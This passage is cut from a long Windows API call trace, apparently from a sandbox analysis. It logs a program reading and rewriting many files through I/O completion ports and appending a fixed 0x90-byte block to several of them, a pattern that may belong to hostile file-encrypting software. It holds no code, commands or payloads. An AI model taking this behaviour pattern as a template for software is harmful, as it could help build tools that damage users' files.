lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.552] CloseHandle (hObject=0x1b8) returned 1 [0158.555] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0158.558] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.558] CloseHandle (hObject=0x1c8) returned 1 [0158.561] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37e0020) returned 1 [0158.563] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.564] CloseHandle (hObject=0x1b4) returned 1 [0158.564] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3900020) returned 1 [0158.675] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.675] ReadFile (in: hFile=0x194, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0158.677] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.677] ReadFile (in: hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 1 [0158.677] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.678] WriteFile (in: hFile=0x194, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xf2f4, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0158.715] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.715] ReadFile (in: hFile=0x194, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0158.715] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.715] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.715] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.716] WriteFile (in: hFile=0x194, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0158.717] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.717] ReadFile (in: hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 0x0 [0158.717] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.717] CloseHandle (hObject=0x194) returned 1 [0158.723] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0158.723] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.980] CloseHandle (hObject=0x1c0) returned 1 [0158.981] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37e0020) returned 1 [0158.983] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.051] ReadFile (in: hFile=0x1c0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0159.051] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.051] WriteFile (in: hFile=0x1c0, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0159.052] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.053] ReadFile (in: hFile=0x1c0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0159.053] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0159.053] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.053] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.053] WriteFile (in: hFile=0x1c0, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0159.072] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.072] ReadFile (in: hFile=0x194, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0159.073] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.073] CloseHandle (hObject=0x1c0) returned 1 [0159.081] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0159.082] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.429] WriteFile (in: hFile=0x1c0, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020) returned 1 [0159.431] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.432] WriteFile (in: hFile=0x1e0, lpBuffer=0x3a20124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3a20020) returned 1 [0159.437] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.437] WriteFile (in: hFile=0x1a8, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020) returned 1 [0159.442] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.442] WriteFile (in: hFile=0x1c, lpBuffer=0x3900094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3900020 | out: lpBuffer=0x3900094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3900020) returned 1 [0159.455] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0159.455] CloseHandle (hObject=0x1b8) returned 1 [0159.472] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37e0020) returned 1 [0159.475] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.423] ReadFile (in: hFile=0x1c4, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3990020) returned 1 [0160.424] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.428] ReadFile (in: hFile=0x1b4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0160.429] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.430] WriteFile (in: hFile=0x1c0, lpBuffer=0x3870124*, nNumberOfBytesToWrite=0x4a8e, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3870020) returned 1 [0160.437] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.437] WriteFile (in: hFile=0x1dc, lpBuffer=0x3bd0124*, nNumberOfBytesToWrite=0x53e7, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3bd0020 | out: lpBuffer=0x3bd0124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3bd0020) returned 1 [0160.460] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.460] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0160.460] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.460] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0160.460] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.460] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0160.460] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.460] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3ab0020) returned 1 [0160.460] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.460] WriteFile (in: hFile=0x1c, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0160.464] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.464] WriteFile (in: hFile=0x1d0, lpBuffer=0x3750094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020) returned 1 [0160.475] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.489] CloseHandle (hObject=0x1f4) returned 1 [0160.530] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0160.532] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.532] CloseHandle (hObject=0x1c0) returned 1 [0160.543] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3870020) returned 1 [0160.545] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.545] ReadFile (in: hFile=0x1f4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0160.546] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.546] WriteFile (in: hFile=0x1e8, lpBuffer=0x3cf0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3cf0020 | out: lpBuffer=0x3cf0094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3cf0020) returned 1 [0160.560] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.560] CloseHandle (hObject=0x1e8) returned 1 [0160.592] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3cf0020) returned 1 [0160.614] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.631] ReadFile (in: hFile=0x1f4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 0x0 [0160.674] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.693] ReadFile (in: hFile=0x1dc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0160.735] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.735] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0160.735] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.736] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 1 [0160.736] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.736] ReadFile (in: hFile=0x1a0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3630020) returned 1 [0160.736] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.736] WriteFile (in: hFile=0x1dc, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x6753, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0160.737] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.737] WriteFile (in: hFile=0x1f4, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0160.737] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.737] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x7caa, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0160.737] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.737] WriteFile (in: hFile=0x1a0, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0xe7fb, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020) returned 1 [0160.738] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.738] ReadFile (in: hFile=0x1dc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0160.738] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.738] CloseHandle (hObject=0x1f4) returned 1 [0160.742] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0160.744] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.744] ReadFile (in: hFile=0x1ec, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 0x0 [0160.745] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.745] ReadFile (in: hFile=0x1a0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3630020) returned 0x0 [0160.745] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.745] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0160.745] GetQueuedCompletionStatus (in: 